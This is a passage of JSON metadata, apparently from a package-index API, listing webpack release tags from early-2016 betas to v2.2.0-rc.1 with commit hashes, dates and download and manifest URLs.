/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","